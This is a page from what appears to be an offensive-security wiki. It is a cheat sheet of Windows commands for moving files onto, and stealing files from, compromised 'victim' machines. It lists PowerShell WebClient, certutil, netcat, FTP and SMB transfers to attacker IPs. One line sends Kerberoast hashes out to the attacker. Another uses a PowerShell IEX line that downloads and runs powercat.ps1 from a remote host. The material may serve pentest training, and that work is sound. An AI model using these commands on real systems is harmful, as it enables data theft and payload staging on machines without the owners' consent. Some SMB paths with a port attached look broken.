Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Transporting Files to/from Victims
  2. Transferring Files to/from High Value Targets

Windows

Uploading Files to Victims in Windows

1. PowerShell Download File

PowerShell provides a built-in method for downloading files directly from a remote web server.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"

Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.

2. Certutil

Certutil is a Windows utility that can be leveraged to download files, bypassing certain security mechanisms in place.

Attacking Machine Command:

python3 -m http.server 8080

Victim Machine Command:

certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransfer

Explanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to download the file.

3. PowerShell IWR (Invoke-WebRequest)

Invoke-WebRequest can be used in PowerShell to download files, similar to wget in Linux.

Attacking Machine Command:

python3 -m http.server 80

Victim Machine Command:

iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe

Explanation: The attacker sets up an HTTP server, and the victim uses PowerShell’s iwr command to download and save the file locally.

4. Netcat

Netcat can be used for transferring files to a victim machine by establishing a network connection.

Victim Machine Command:

nc.exe -lvp 4444 > FileToTransfer

Attacking Machine Command:

nc 10.10.10.2 4444 -w 3 < FileToTransfer

Explanation: The victim machine listens on port 4444 for incoming data, and the attacker sends the file over to it using nc.

5. FTP

FTP can be used to transfer files between systems. Here’s how to do it using a simple FTP server.

Attacking Machine Command:

twistd -n ftp -r .

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
get FileToTransfer
bye

Explanation: The attacker runs an FTP server using twistd, and the victim machine connects to it to download the file.

6. SMB

SMB is commonly used for file sharing in Windows environments. This command allows for transferring files over the SMB protocol.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy \\10.10.10.1:8080\FileToTransfer FileToTransfer

Explanation: The attacker sets up an SMB server using impacket-smbserver, and the victim copies the file from the SMB share.

Downloading Files from Victims in Windows

1. Netcat

Netcat can be used to receive files from a victim machine by listening on a port.

Attacking Machine Command:

nc -lvp 4444 > hashes.kerberoast

Victim Machine Command:

nc.exe 10.10.10.1 4444 -w 3 < hashes.kerberoast

Explanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.

2. FTP

FTP can also be used to upload files from the victim machine to the attacker’s machine.

Attacking Machine Command:

python -m pyftpdlib -w

Victim Machine Command:

ftp
open 10.10.10.1 2121
anonymous
put FileToDownload
bye

Explanation: The attacker runs an FTP server, and the victim machine uploads the file using FTP commands.

3. SMB

SMB is also useful for downloading files from the victim machine back to the attacker’s system.

Attacking Machine Command:

impacket-smbserver -smb2support test .

Victim Machine Command:

copy FiletoDownload \\10.10.10.1:8080\FiletoDownload

Explanation: The attacker sets up an SMB server and the victim machine retrieves the file from the SMB share.

4. PowerCat

PowerCat is a PowerShell-based tool used for networking. It can be used for file transfers in a similar manner to Netcat.

Victim Machine Command:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"

Attacking Machine Command:

wget http://10.10.10.2:4444/FiletoDownload

Explanation: The attacker listens on port 4444 for incoming data, and the victim machine uses PowerCat to send the file back over to the attacker.

PreviousLinuxNextCrackMapExec (NetExec)

Last updated 18 days ago